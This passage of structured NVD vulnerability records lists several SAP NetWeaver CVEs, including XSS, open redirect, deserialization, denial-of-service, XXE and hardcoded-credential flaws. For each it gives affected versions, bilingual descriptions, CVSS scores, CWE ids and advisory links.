"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-12T20:15:13.997",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-11-13 20:29
Modified
2024-11-21 04:03
Severity ?
Summary
Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105898 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2658755 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105898 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2658755 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Due to insufficient URL Validation in forums in SAP NetWeaver versions 7.30, 7.31, 7.40, an attacker can redirect users to a malicious site."
},
{
"lang": "es",
"value": "Debido a la validaci\u00f3n de URL insuficiente en los foros en SAP NetWeaver 7.30, 7.31 y 7.40, un atacante puede redirigir a los usuarios a un sitio malicioso."
}
],
"id": "CVE-2018-2476",
"lastModified": "2024-11-21T04:03:53.150",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-11-13T20:29:00.357",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105898"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105898"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2658755"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-601"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2010-07-28 21:30
Modified
2024-11-21 01:17
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | system_landscape_directory | 6.4 | |
| sap | system_landscape_directory | 7.0 | |
| sap | system_landscape_directory | 7.02 | |
| sap | netweaver | * | |
| sap | netweaver | 6.4 | |
| sap | netweaver | 7.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:system_landscape_directory:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "4A8832E5-34A4-447F-AA41-115D4FD5E03E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:system_landscape_directory:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C5CD3BF8-FF70-411B-884A-6EC0C3347AF2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:system_landscape_directory:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "7186A608-21BF-4529-AD4C-E40C74F83A7F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A35F93E3-FC19-4A52-885A-AA2112CAF34D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en el componente System Landscape Directory (SLD) v6.4 hasta v7.02 en SAP NetWeaver, permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s del par\u00e1metro (1) action sobre testsdic y (2) helpstring sobre paramhelp.jsp."
}
],
"id": "CVE-2010-2904",
"lastModified": "2024-11-21T01:17:36.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2010-07-28T21:30:02.650",
"references": [
{
"source": "cve@mitre.org",
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/40712"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/66639"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/66640"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1416047"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://dsecrg.com/pages/vul/show.php?id=168"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.org/1007-advisories/DSECRG-09-068.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/40712"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/66639"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/66640"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2010/1935"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/60668"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1416047"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-07-12 16:29
Modified
2024-11-21 03:36
Severity ?
Summary
SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7400.12.21.30308:*:*:*:*:*:*:*",
"matchCriteriaId": "37FBEE54-4F7B-4F26-B6A2-0B42E7ED9AF6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7400.12.21.30308 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object in a request to metadatauploader, aka SAP Security Note 2399804."
},
{
"lang": "es",
"value": "AP NetWeaver versi\u00f3n 7400.12.21.30308 permite a los atacantes remotos causar una denegaci\u00f3n de servicio y, posiblemente, ejecutar c\u00f3digo arbitrario por medio de un objeto Java serializado creado en una petici\u00f3n a metadatauploader, tambi\u00e9n se conoce como Nota de Seguridad de SAP 2399804."
}
],
"id": "CVE-2017-9844",
"lastModified": "2024-11-21T03:36:58.270",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-07-12T16:29:00.420",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/96865"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/96865"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-17-014-sap-netweaver-java-deserialization-untrusted-user-value-metadatauploader/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n de DiagiEventSource en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el distribuidor de la plataforma SAP NetWeaver 7.0 EHP1 y EHP2 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de demonio) a trav\u00e9s de un elaborado paquete SAP Diag."
}
],
"id": "CVE-2012-2514",
"lastModified": "2024-11-21T01:39:10.083",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.500",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-11-04 15:55
Modified
2024-11-21 02:19
Severity ?
Summary
Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en SAP Host Agent, utilizado en SAP NetWeaver 7.02 y 7.3, permite a atacantes remotos causar una denegaci\u00f3n de servicio (terminaci\u00f3n de proceso) a trav\u00e9s de una solicitud manipulada."
}
],
"id": "CVE-2014-8592",
"lastModified": "2024-11-21T02:19:24.017",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-11-04T15:55:07.827",
"references": [
{
"source": "cve@mitre.org",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"source": "cve@mitre.org",
"url": "https://twitter.com/SAP_Gsupport/status/523111735637864448"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://twitter.com/SAP_Gsupport/status/523111735637864448"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8AAB3DAC-021F-4C9E-B46E-BD656C1AB629",
"versionEndIncluding": "7.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F59EAE32-F443-490E-9213-596430E406E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A35F93E3-FC19-4A52-885A-AA2112CAF34D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"matchCriteriaId": "ABEE6BE3-556F-4A1E-8FA3-CD5E5C1D42E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"matchCriteriaId": "73914503-E9AA-4382-85FC-B0DD45ABDD77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"matchCriteriaId": "369D0212-65DA-4121-981B-1F07B7465F97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue."
},
{
"lang": "es",
"value": "La funci\u00f3n SHSTI_UPLOAD_XML en Application Server for ABAP (AS ABAP) de SAP NetWeaver 7.31 y anteriores permite a atacantes remotos provocar una denegaci\u00f3n de servicio a trav\u00e9s de vectores sin especificar, relacionado con un problema XML External Entity (XXE)."
}
],
"id": "CVE-2013-6815",
"lastModified": "2024-11-21T01:59:45.610",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-11-20T14:12:30.913",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55620"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1890819"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55620"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1890819"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-06-24 14:59
Modified
2024-11-21 02:32
Severity ?
Summary
The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982."
},
{
"lang": "es",
"value": "El (1) Cross-System Tools y (2) Data Transfer Workbench en SAP NetWeaver tienen credenciales codificadas, lo que permite a atacantes remotos obtener acceso a trav\u00e9s de vectores no especificados, vulnerabilidad tambi\u00e9n conocida como SAP Security Notes 2059659 y 2057982."
}
],
"id": "CVE-2015-5067",
"lastModified": "2024-11-21T02:32:15.657",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
